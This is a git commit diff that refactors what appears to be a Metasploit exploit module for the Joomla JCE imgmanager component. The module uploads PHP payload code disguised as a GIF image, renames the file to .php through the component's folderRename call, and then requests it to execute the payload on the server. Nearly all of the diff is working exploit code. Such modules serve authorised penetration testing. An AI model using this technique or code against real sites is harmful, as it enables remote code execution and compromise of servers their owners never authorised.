improve cleanup

HeyderAndrade · HeyderAndrade · commit 014c01099edb · 2013-03-26T02:22:10.000-03:00
diff --git a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb
@@ -58,12 +58,18 @@ def initialize(info = {})
 
 	def get_version
 		# check imgmanager version
-		@uri_base = normalize_uri(target_uri.path.to_s) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
-		uri =  @uri_base
+		@uri_base 		= normalize_uri(target_uri.path.to_s, 'index.php')
+		@vars_get_base 	=  	{
+								'option'=> 'com_jce',
+								'task'  => 'plugin',
+								'plugin'=> 'imgmanager',
+								'file'  => 'imgmanager'
+							}
 		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
 		res = send_request_cgi(
 			{
-				'uri' 	  => uri,
+				'uri' 	  => @uri_base,
+				'vars_get' => @vars_get_base,
 				'method'  => 'GET',
 				'version' => '1.1'
 
@@ -93,35 +99,38 @@ def upload_gif
 		cmd_php = "GIF89aG\n<?php #{payload.encoded}  ?>"
 
 		# Generate some random strings
-		@script_name  	= rand_text_alpha_lower(6)
+		@payload_name  	= rand_text_alpha_lower(6)
 		boundary   		= '-' * 27 + rand_text_numeric(11)
-		uri = @uri_base + '&method=form'
+
+		parms 			= {'method'=> 'form'}
+		parms.merge!(@vars_get_base)
 
 		# POST data
 		post_data = Rex::MIME::Message.new
 		post_data.bound = boundary
 		post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
 		post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
 		post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
-		post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"")
-		post_data.add_part("#{@script_name}", nil, nil, "form-data; name=\"upload-name\"")
+		post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
+		post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
 		post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
 
 		data = post_data.to_s
 
 		res = send_request_cgi({
-			'uri'	  => uri,
-			'method'  => 'POST',
-			'version' => '1.1',
-			'data'    => data,
-			'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+			'uri'	  	=> @uri_base,
+			'vars_get' 	=> parms,
+			'method'  	=> 'POST',
+			'version' 	=> '1.1',
+			'data'    	=> data,
+			'ctype'  	=> "multipart/form-data; boundary=#{post_data.bound}"
 		})
 
 		if (res and res.code = 200 )
 			return :access_denied if (res.body =~ /RESTRICTED/i)
-			print_good("Successfully uploaded #{@script_name}.gif")
+			print_good("Successfully uploaded #{@payload_name}.gif")
 		else
-			print_error("Error uploading #{@script_name}.gif")
+			print_error("Error uploading #{@payload_name}.gif")
 			return :abort
 		end
 
@@ -131,15 +140,15 @@ def upload_gif
 
 	def renamed?
 		# Rename the file from .gif to .php
-		uri = @uri_base # '&version=1576&cid=20'
 
-		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
+		data =	"json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"
 
-		print_status("Change Extension from #{@script_name}.gif to #{@script_name}.php")
+		print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")
 
 		res = send_request_cgi(
 			{
-				'uri'       => uri,
+				'uri'       => @uri_base,
+				'vars_get'	=> @vars_get_base,
 				'method'    => 'POST',
 				'version'   => '1.1',
 				'data' 	    => data,
@@ -150,31 +159,27 @@ def renamed?
 				}
 			})
 		if (res and res.code == 200 )
-			print_good("Renamed #{@script_name}.gif to #{@script_name}.php")
+			print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
 			return true
 		else
-			print_error("Failed to rename #{@script_name}.gif to #{@script_name}.php")
+			print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
 			return false
 		end
 	end
 
 	def call_payload
-		directory   = 'images/stories/'
-		print_status("Calling payload: #{@script_name}.php")
-		uri = normalize_uri(target_uri.path.to_s)
-		uri << directory + @script_name + ".php"
-		register_files_for_cleanup(uri)
-
+		payload = "#{@payload_name}.php"
+		print_status("Calling payload: #{payload}")
+		uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
+		register_files_for_cleanup(payload)
 		res = send_request_cgi({
 			'uri'	=> uri,
 			'method'    => 'GET',
 			'version'   => '1.1'
 		})
 	end
 
-	def on_new_session
-		# on_new_session will force stdapi to load (for Linux meterpreter)
-	end
+
 
 	def exploit
 
@@ -187,4 +192,4 @@ def exploit
 
 	end
 
-end
+end
